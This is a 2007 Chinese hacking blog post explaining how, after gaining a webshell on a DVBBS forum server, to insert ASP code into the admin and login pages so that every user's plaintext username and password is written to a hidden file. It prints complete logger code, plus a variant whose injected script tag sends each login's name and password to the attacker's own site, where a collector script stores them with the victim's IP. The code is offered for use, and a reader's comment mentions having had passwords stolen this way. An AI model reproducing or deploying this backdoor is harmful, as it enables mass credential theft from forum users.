追求卓越,资源共享
个人计算机技术交流站点,主要包括网络攻防,漏洞利用,程序开发,服务器安全linux等技术,欢迎大家来一起交流
心情更新...

获得DVBBS的所有密码新方法|黑暗天堂

获得DVBBS的所有密码新方法
今天想分析一下来我这里发垃圾评论的网站外连情况结果搜索出来了 918X来了一篇技术文章不用多说我一看就是RAIN写的。以前黑暗天堂里的一个站长

我们知道以前,获得webshell后想进入DVBBS的后台,想要管理员的密码可以这样:
老办法:
修改admin_index.asp得到明文DVBBS后台密码  
在"username=trim(replace(request("username")这行后面  
Dim fsoObject  
Dim tsObject  
Set fsoObject = Server.CreateObject("Scripting.FileSystemObject")  
set tsObject = fsoObject.CreateTextFile(Server.MapPath("rain.txt"))  
tsObject.Write CStr(request("password"))  
Set fsoObject = Nothing  
Set tsObject = Nothing  
只要管理员登陆后台,在目录下就生成了rain.txt,里面就记录了明文密码  

这个办法有个缺点是需要FileSystemObject的支持,也就是需要FSO,对于没有FileSystemObject的主机就没有用了。

新办法:

方法一:login.asp中Case "chk"下:  
   on error resume next  
   dim rain  
   set lP=server.CreateObject("Adodb.Stream")  
   rain.Open  
   rain.Type=2  
   rain.CharSet="gb2312"  
   rain.LoadFromFile server.mapPath("918.asp")  
   rain.Position=lp.Size  
   rain.writetext now&request("username")&"text:"&request("password")&chr(10)  
   rain.SaveToFile server.mapPath("918.asp"),2  
   rain.Close  
   set rain=nothing  
这样918.asp将获得全部登陆人的密码,时间和名字。
至于admin_index.asp你也可以加在这里只获得管理员的密码。  
方法二:如果你有自己的网站:  
建立目录918x,在里面建立一个空的918.asp和如下代码的rain.asp:  
<%@codepage=936%>
<%Response.Expires=0 if request("k")="k" then%>  
<pre><!--#include file="918.asp"-->  
<%elseif request("n")<>"" and request("p")<>"" then  
   on error resume next  
   dim rain  
   set rain=server.CreateObject("Adodb.Stream")  
   rain.Open  
   rain.Type=2  
   rain.CharSet="gb2312"  
   rain.LoadFromFile server.mapPath("918.asp")  
   zh=rain.readtext(6152192)&"<"&"%if isempty(request(""k"")) then response.redirect ""rain.asp""%"&">"  
   rain.Position=0  
   rain.writetext now&"有大侠以名 "&request("n")&" 及密码 "&request("p")&" 试图登陆;其IP:"&Request.ServerVariables("REMOTE_ADDR")&"["&Request.ServerVariables("HTTP_X_FORWARDED_FOR")&"]"&chr(13)&chr(10)&zh  
   rain.SaveToFile server.mapPath("918.asp"),2  
   rain.Close  
   set rain=nothing  
end if%>  

在login.asp那里插入一句:  
response.write "<SCRIPT src=http://你网站/918x/rain.asp?n="&request("username")&"&"&p="&request("password")&"></SCRIPT>"  
--------所有登陆人都会乖乖的把名字和密码送到你的918.asp 里

这下调用Adodb.Stream,几乎机子里有是有的,所以成功率要更高。

{keywords:获得DVBBS的所有密码新方法|黑暗天堂}是本站 (追求卓越,资源共享) 中一篇关于keywords:获得DVBBS的所有密码新方法|黑暗天堂最经典的文章,欢迎您阅读和评论,您可以从百度搜索获得DVBBS的所有密码新方法|黑暗天堂其它信息,也可以从google中查询更多获得DVBBS的所有密码新方法|黑暗天堂的相关信息。
标签:黑暗天堂dvbbs漏洞
分类:技术交流| 发布:laibu| 查看: | 发表时间:2007-9-26
原创文章如转载,请注明:转载自黑暗天堂 http://www.918x.cn/
本文链接:http://www.918x.cn/post/288.html

相关文章

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

1 #一剑
一剑 怪不得原来我做DVBBS的时候,密码随时被别人获取捏~~
http://www.onehappy.net/blog 2007-9-28 9:32:25 【REPLY】
2 #laibu
laibu 可惜他很上网上。最近都没联系上他
http://www.918x.cn 2007-9-29 9:08:34 【REPLY】

广告宣传

置顶推荐

本类更新

    24小时排行
  • 最新评论
  • 最新留言

热门文章

Copyright 2007-2011 黑暗天堂. 粤ICP备09131588号 .Some Rights Reserved.